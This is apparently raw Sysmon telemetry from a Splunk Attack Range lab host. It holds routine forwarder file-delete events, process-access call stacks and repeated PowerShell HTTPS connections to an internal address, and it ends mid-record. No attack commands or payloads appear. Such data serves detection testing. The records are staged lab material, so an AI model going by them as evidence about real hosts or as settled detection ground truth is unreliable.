AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.991{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C9084DC9B7D9FC194CCD9677AFDA5C4C,SHA256=5DD427440C3587FDE0C86389AB768CBDAABE7A988D5D5AC577660B68C273B319,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.544{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9FF21159C331314B1BD9A71853CCB98,SHA256=158BCB79F162CAAF8FEC691C4FA1608A63E8F8F0589611F9846F37DD314CF070,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B970E1DD990F5B025B8BF1FB38BFA361,SHA256=E57751DB990B120B9E1CABDA7D2F0DFF4FEABAED4EE85EA23A8D019DEB7B8C73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA251159CD270862E5A2982B865AA050,SHA256=469001485C42C701FEF2E59E66B2DAC1D541F22F238A02A73EA254CCE2938E8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.091{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:14.077{B81B27B7-4E06-613A-3690-03000000C801}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:39.863{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56594-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:15.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A9D7DED697D6EE55D5AAF60EA4B283,SHA256=006E975524113B67D439A4302BCE860CA26991BE08FFE354D7EA9B7E4ADE3DA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:16.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D9B8251CB380B8B470193DE71971914,SHA256=124686DD15A28B996DCAE1591B0EEEA0B753E254597472ABE234F3C45432F6FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:17.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27B9E8FFEF7AEA9AB2EF8E74DDC7409,SHA256=ED857320E660DC9153901C5CC6275CE4E009E576E9C633C4A07EB5C3505C1319,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:18.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C318676B9DEE3C9AAD666E67D562CBCA,SHA256=18290D2F4DAB231F83B07449F9652C7FE6B6AEB2BC62116BC6EEF05E18EB0BB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:42.060{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56595-false10.0.1.12-8000- 23542300x800000000000000035084365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:19.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC7406AE65D0662C7541255C9855616,SHA256=6FF9E5DBD0FC7A23291AC65996FCBFF92F37909A5153B18425EEC0A99ECD6718,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.875{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56596-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:19.056{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3675F2993B242847B66F1AEAAE904475,SHA256=8E6F2E5E115E2D39850354F8ECE5614BD6C8721B510FD93C336CE968E6D7D0BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:20.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7E82F03F77216A56577900CE2ECEBD8,SHA256=E611D6CE47C2AA3B826CD8DE6E03DCFD85873E3C65E1CB9A0AC0FD65224DB256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:21.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C196BF37B36ED4D07BACFACFD917AFC3,SHA256=6A3898E8994E42941B77A87CE883F7AA260F17D50C6E616D346B3C8DB6DD68A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:22.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BD65466268C5844D89674BBF82652E,SHA256=8B04ED8B41550AB8EA0F374FC168F51CC39731301B32A4EBCC6EA8CC10EF4381,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:48.058{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56597-false10.0.1.12-8000- 23542300x800000000000000035084369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:23.771{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7436BE1593DCF5A47A2FE13B274D3AE,SHA256=FF6EEB33FCDBECE3C7400D6A5BD3BF772ADF1A7417BB35728418931E40D10902,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:24.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0ED04D0A30EA5C0229035C349576525E,SHA256=4A4656F0084E34A941A293B4D86692109DD07D979AB5EA6127B56C8936FB5298,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:24.808{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B13318813F3696E0D70A108E4974B41,SHA256=E156291A0DF82717FB3A679DB94F4C49AB77ADE8D1D10960FA363B021D5B02E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:49.905{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56598-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:25.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8984C770D43BBD1BE43BB25AA5EC7D9,SHA256=FD5BE7523C152C55E2D06F61C2EDD115451317AD87AFA8DF60B8162B560FA0B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:26.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=943ABC8496D7BCEDCECB49F0206121EC,SHA256=33CB3AC63D4A78192AE18F981041A8BE5F41A88098591260F9AFD30442806CB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:27.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B250995F8E6F54E0AED0D0B57937C194,SHA256=CA2C5A42CE2630C9BEF29D8C9DBE5E09EEAEF5E9F5B3E9D15CC3C9BB9893D9C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.941{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B753A1DC53D89DBE1427B011EEC7FC7F,SHA256=6CDD342AB68A15ADCEB51A5BD47C202E0C594492ED5C0CA7D2ACF9961548999D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 